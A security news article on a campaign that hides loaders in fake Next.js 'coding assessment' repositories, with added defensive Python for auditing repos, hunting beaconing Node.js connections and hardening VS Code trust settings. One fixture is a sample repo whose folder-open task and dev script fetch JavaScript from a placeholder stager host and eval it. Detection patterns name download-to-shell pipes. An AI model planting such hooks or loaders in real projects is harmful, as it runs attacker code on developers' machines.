Threat actors leveraged “technical assessment” projects, using consistent naming schemes and hooking malicious code into the routine steps of cloning and building a project so that it ran as part of normal developer workflows. They further concealed their operations by fetching loader scripts from external servers and reducing their digital footprint on compromised systems.
Microsoft has revealed a sophisticated campaign specifically targeting software developers. This attack involves malicious repositories cleverly disguised as genuine Next.js projects and standard technical evaluations.
Attackers designed this campaign with highly deceptive lures, enabling them to integrate covertly into common developer tasks like repository cloning, project opening, and build execution. This strategy ensured the malicious code ran without detection.
During an incident investigation, Microsoft gathered telemetry indicating this campaign is part of a larger threat landscape employing employment-themed deception. As stated in a recent Microsoft security blog post, “Initial analysis of Defender telemetry identified a specific group of malicious repositories linked to confirmed compromises.” The company added that “Subsequent investigations revealed more connected repositories that, while not explicitly logged, displayed identical execution methods, loader logic, and staging infrastructure.”
This operation capitalizes on developers’ inherent trust in shared code. By doing so, it establishes a foothold within critical developer systems, which typically house sensitive assets such as source code, environment configurations, credentials, and pathways to build or cloud environments.
Diverse Activation Methods for Remote Access
Microsoft’s research uncovered that these malicious repositories were designed with built-in redundancy, providing multiple ways for their code to execute, all leading to the same backdoor functionality.
Remarkably, in certain instances, merely opening the project within Visual Studio Code initiated the compromise. The attackers exploited workspace automation by embedding tasks that would execute automatically upon a folder being opened and trusted, thereby allowing code to run without any explicit action from the developer.
Other versions of this attack leverage standard build processes or server initialization sequences, guaranteeing that the harmful code activates whenever developers execute routine tasks like starting a development server. Irrespective of the specific trigger, these repositories download supplementary JavaScript files from external infrastructure and run them in memory, effectively minimizing their presence on the hard drive.
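The three execution paths described above (a workspace task that VS Code runs when the folder is opened and trusted, an npm script invoked by a routine dev or build command, and a script that fetches remote JavaScript and evaluates it in memory) can be checked for before anyone opens a cloned repository. The following Python audit is an added example, not code from the article or from Microsoft's report. The sample repository it scans is constructed, the regexes are heuristics rather than signatures, and the one real mechanism it keys on is VS Code's `runOptions.runOn: "folderOpen"` entry in `.vscode/tasks.json`.

```python
import json
import re

# Heuristic patterns for loader-style behaviour: fetch something remote and hand
# it to an evaluator, pipe a download into an interpreter, or decode base64.
LOADER_PATTERNS = {
    "remote-fetch-then-eval": re.compile(
        r"(fetch|https?\.get|axios|request)\(.{0,200}?(\beval\(|new Function|vm\.run)", re.S),
    "download-piped-to-interpreter": re.compile(r"\b(curl|wget)\b.*\|\s*(node|sh|bash)\b"),
    "inline-node-eval": re.compile(r"\bnode\s+-e\b"),
    "base64-decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|base64\s+(-d|--decode)"),
}
# npm scripts that run during routine developer actions (install, dev server, build).
ROUTINE_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "dev", "start", "build"}


def _load_jsonc(text):
    """Parse VS Code style JSON that may contain // comment lines and trailing commas."""
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def find_folder_open_tasks(tasks_json_text):
    """Tasks VS Code would start automatically once the folder is opened and trusted."""
    doc = _load_jsonc(tasks_json_text)
    return [t for t in doc.get("tasks", [])
            if (t.get("runOptions") or {}).get("runOn") == "folderOpen"]


def _match_patterns(text):
    return [name for name, rx in LOADER_PATTERNS.items() if rx.search(text)]


def audit_repo(files):
    """files: {relative_path: content}. Returns one finding per execution trigger
    or loader pattern, each tagged with the path that would run it."""
    findings = []
    # 1. Source files carrying loader-style code (fetch remote JS, run it in memory).
    flagged = {}
    for path, content in files.items():
        if path.endswith((".js", ".mjs", ".cjs", ".ts")):
            hits = _match_patterns(content)
            if hits:
                flagged[path] = hits
                findings.append({"path": path, "trigger": "loader-pattern", "detail": hits})

    def refers_to_flagged(cmd):
        return [p for p in flagged if p in cmd]

    # 2. Workspace tasks that fire on folder open.
    tasks = files.get(".vscode/tasks.json")
    if tasks:
        for t in find_folder_open_tasks(tasks):
            cmd = t.get("command", "")
            findings.append({"path": ".vscode/tasks.json", "trigger": "vscode-folderOpen",
                             "detail": cmd, "runs_flagged": refers_to_flagged(cmd)})
    # 3. npm scripts reached by routine commands such as `npm run dev` or `npm run build`.
    pkg = files.get("package.json")
    if pkg:
        for name, cmd in json.loads(pkg).get("scripts", {}).items():
            hits = _match_patterns(cmd) + refers_to_flagged(cmd)
            if hits:
                findings.append({"path": "package.json", "trigger": f"npm-script:{name}",
                                 "routine": name in ROUTINE_SCRIPTS, "detail": hits})
    return findings


# Constructed sample repository: a Next.js looking project with all three execution
# paths wired to the same helper script. Hostname is a placeholder, not campaign data.
SAMPLE_REPO = {
    "package.json": json.dumps({
        "name": "assessment-nextjs",
        "scripts": {"dev": "node scripts/env-check.js && next dev",
                    "build": "next build",
                    "start": "next start"},
    }),
    ".vscode/tasks.json": """{
  // innocuous looking workspace automation
  "version": "2.0.0",
  "tasks": [
    { "label": "env-check", "type": "shell", "command": "node scripts/env-check.js",
      "runOptions": { "runOn": "folderOpen" }, },
  ],
}""",
    "scripts/env-check.js": (
        "const https = require('https');\n"
        "https.get('https://stager.placeholder.invalid/l.js', r => {\n"
        "  let src = ''; r.on('data', c => src += c); r.on('end', () => eval(src));\n"
        "});\n"),
}

if __name__ == "__main__":
    for finding in audit_repo(SAMPLE_REPO):
        print(finding)
```

Run against a real clone by reading the files into the `files` dict; the point of reporting the `runs_flagged` link is that a folderOpen task or `dev` script which merely calls a local helper looks harmless on its own, and only the join with the loader-pattern scan shows that opening the folder or starting the dev server reaches the same remote fetch.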
The downloaded malicious payload functions in distinct phases. Initially, a registration module identifies the compromised host and can issue foundational instructions. Subsequently, a dedicated C2 (command and control) controller ensures long-term persistence and facilitates further malicious activities, including deploying additional payloads and exfiltrating data.
Compromise Via Deceptive “Coding Assessment”
Microsoft’s investigation commenced by examining unusual outbound connections originating from Node.js processes communicating with servers under the attackers’ control. By correlating this network activity with process telemetry, analysts were able to trace the initial infection back to recruitment-related activities.
A specific repository, discovered on Bitbucket, was disguised as a technical assessment. It was found alongside another repository adhering to the “Cryptan-Platform-MVP1” naming scheme. Microsoft noted that “Numerous repositories adhered to consistent naming conventions and project ‘family’ structures, which facilitated focused searches for other related repositories not explicitly highlighted in initial telemetry, yet demonstrating identical execution and staging characteristics.”
Should an infection be suspected, Microsoft advises organizations to promptly isolate compromised endpoints, identify the root process, and scan their systems for recurring communication with suspicious infrastructure. Given the potential for subsequent credential and session theft, incident responders are urged to assess identity risks, invalidate active sessions, and restrict access to high-risk SaaS applications to minimize further exposure during their investigation.
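The investigation thread described earlier (unusual outbound connections from Node.js processes, correlated with process telemetry) and the triage steps just listed (find the root process, look for recurring communication with suspicious infrastructure) can be expressed as three small detections over process and network telemetry. The Python below is an added example, not Microsoft's detection logic: the `key=value` log layout, the sample lines, the allowlist and the beaconing threshold are all constructed for the illustration, the IP addresses come from the 203.0.113.0/24 documentation range, and the hostnames are placeholders.

```python
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev

# Destinations a Next.js developer workstation is expected to reach (example list).
ALLOWLIST = {"registry.npmjs.org", "github.com", "bitbucket.org"}
NODE_IMAGES = {"node", "node.exe", "npm", "npm.cmd", "npx", "npx.cmd"}
IDE_PARENTS = {"code", "code.exe"}

# Constructed sample: one record per process start or outbound connection.
# Documentation-range IPs and placeholder hostnames; none of this is campaign data.
SAMPLE_TELEMETRY = """\
2024-05-02T09:10:00Z host=dev-42 pid=3001 ppid=800 image=Code.exe parent=explorer.exe dst=- sni=-
2024-05-02T09:10:05Z host=dev-42 pid=3050 ppid=3001 image=npm.cmd parent=Code.exe dst=203.0.113.5:443 sni=registry.npmjs.org
2024-05-02T09:11:00Z host=dev-42 pid=3120 ppid=3001 image=node.exe parent=Code.exe dst=203.0.113.10:443 sni=stager.placeholder.invalid
2024-05-02T09:12:00Z host=dev-42 pid=3120 ppid=3001 image=node.exe parent=Code.exe dst=203.0.113.20:443 sni=c2.placeholder.invalid
2024-05-02T09:13:00Z host=dev-42 pid=3120 ppid=3001 image=node.exe parent=Code.exe dst=203.0.113.20:443 sni=c2.placeholder.invalid
2024-05-02T09:13:30Z host=dev-42 pid=3400 ppid=3300 image=node.exe parent=cmd.exe dst=127.0.0.1:3000 sni=-
2024-05-02T09:14:00Z host=dev-42 pid=3120 ppid=3001 image=node.exe parent=Code.exe dst=203.0.113.20:443 sni=c2.placeholder.invalid
2024-05-02T09:15:01Z host=dev-42 pid=3120 ppid=3001 image=node.exe parent=Code.exe dst=203.0.113.20:443 sni=c2.placeholder.invalid
"""


def parse_line(line):
    """Turn one 'timestamp key=value ...' record into a dict with typed fields."""
    ts, rest = line.split(" ", 1)
    rec = dict(kv.split("=", 1) for kv in rest.split())
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    rec["pid"], rec["ppid"] = int(rec["pid"]), int(rec["ppid"])
    return rec


def load_sample():
    return [parse_line(l) for l in SAMPLE_TELEMETRY.splitlines() if l.strip()]


def is_external(dst):
    """Ignore process-start records (dst=-) and the local dev server on loopback."""
    return dst != "-" and not dst.startswith(("127.", "[::1]", "localhost"))


def suspicious_connections(records, allowlist=ALLOWLIST):
    """Node.js connections to destinations outside the allowlist. Each finding notes
    whether the IDE spawned the process, the shape seen when open-and-trust is the trigger."""
    out = []
    for r in records:
        if r["image"].lower() in NODE_IMAGES and is_external(r["dst"]) and r["sni"] not in allowlist:
            out.append({"pid": r["pid"], "dst": r["dst"], "sni": r["sni"],
                        "spawned_by_ide": r["parent"].lower() in IDE_PARENTS})
    return out


def process_chain(records, pid):
    """Follow ppid links as far as the telemetry allows; image names from leaf to root."""
    by_pid = {r["pid"]: r for r in records}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain


def recurring_destinations(records, min_count=3, max_jitter=0.2):
    """Destinations one process contacts repeatedly on a steady cadence: at least
    min_count connections whose inter-arrival stddev/mean stays under max_jitter."""
    groups = defaultdict(list)
    for r in records:
        if is_external(r["dst"]):
            groups[(r["pid"], r["dst"], r["sni"])].append(r["ts"])
    out = []
    for (pid, dst, sni), times in groups.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            out.append({"pid": pid, "dst": dst, "sni": sni,
                        "count": len(times), "period_s": round(mean(gaps), 1)})
    return out


if __name__ == "__main__":
    recs = load_sample()
    for s in suspicious_connections(recs):
        print("outbound:", s, "chain:", process_chain(recs, s["pid"]))
    for b in recurring_destinations(recs):
        print("recurring:", b)
```

The allowlist approach is deliberate: a developer box has a small, knowable set of legitimate Node.js destinations (package registries, source hosting), so anything else from `node` is worth a look, and a `Code.exe` parent on such a connection is the specific signature of the folder-open trigger. The cadence check is what turns a single odd connection into the "recurring communication" the response guidance asks responders to hunt for.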
For long-term risk reduction, Microsoft emphasized the importance of reinforcing developer trust boundaries and mitigating execution risks. Additional recommendations include mandating Visual Studio Code Workspace Trust by default, implementing attack surface reduction rules, activating cloud-based reputation safeguards, and enhancing conditional access policies.
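"Mandating Visual Studio Code Workspace Trust by default" is concrete enough to check on a workstation. The Python below is an added example, not from the article or from Microsoft: it reads a `settings.json`, compares it with a hardened baseline, and emits the corrected settings. The setting names are real VS Code settings (`security.workspace.trust.*` and `task.allowAutomaticTasks`; verify them against the VS Code version you deploy), but the chosen values are this example's baseline, not a quoted Microsoft one, and the weak sample file is constructed.

```python
import json
import re

# setting -> (hardened value, reason). Values are this example's baseline.
HARDENED = {
    "security.workspace.trust.enabled": (True, "Workspace Trust stays on; unreviewed folders open in Restricted Mode"),
    "security.workspace.trust.startupPrompt": ("always", "ask on every unknown folder; never a remembered blanket answer"),
    "security.workspace.trust.untrustedFiles": ("newWindow", "outside files open restricted instead of inheriting trust"),
    "security.workspace.trust.emptyWindow": (False, "an empty window is not trusted by default"),
    "task.allowAutomaticTasks": ("off", "folderOpen tasks never start unless the developer runs them"),
}

# Constructed weak sample: prompts switched off on a workstation "to save time".
WEAK_SETTINGS = """{
  // user settings.json
  "security.workspace.trust.enabled": false,
  "security.workspace.trust.startupPrompt": "never",
  "task.allowAutomaticTasks": "on",
  "editor.fontSize": 14,
}"""


def _load_jsonc(text):
    """settings.json allows // comment lines and trailing commas; strip both before parsing."""
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def audit_settings(settings_text):
    """Return (findings, hardened). A key that is absent counts as a finding too, so
    the managed configuration states every trust setting explicitly."""
    current = _load_jsonc(settings_text)
    findings = [{"setting": key, "current": current.get(key), "recommended": want, "why": why}
                for key, (want, why) in HARDENED.items() if current.get(key) != want]
    hardened = dict(current)
    hardened.update({key: want for key, (want, _) in HARDENED.items()})
    return findings, hardened


def render(settings):
    """Serialize settings as strict JSON suitable for writing back to settings.json."""
    return json.dumps(settings, indent=2)


if __name__ == "__main__":
    findings, fixed = audit_settings(WEAK_SETTINGS)
    for f in findings:
        print(f"{f['setting']}: {f['current']!r} -> {f['recommended']!r} ({f['why']})")
    print(render(fixed))
```

With Workspace Trust enforced, a repository such as the ones described in this campaign opens in Restricted Mode, where VS Code does not run workspace tasks; `task.allowAutomaticTasks` set to `off` removes the folderOpen path even after a developer has chosen to trust a folder.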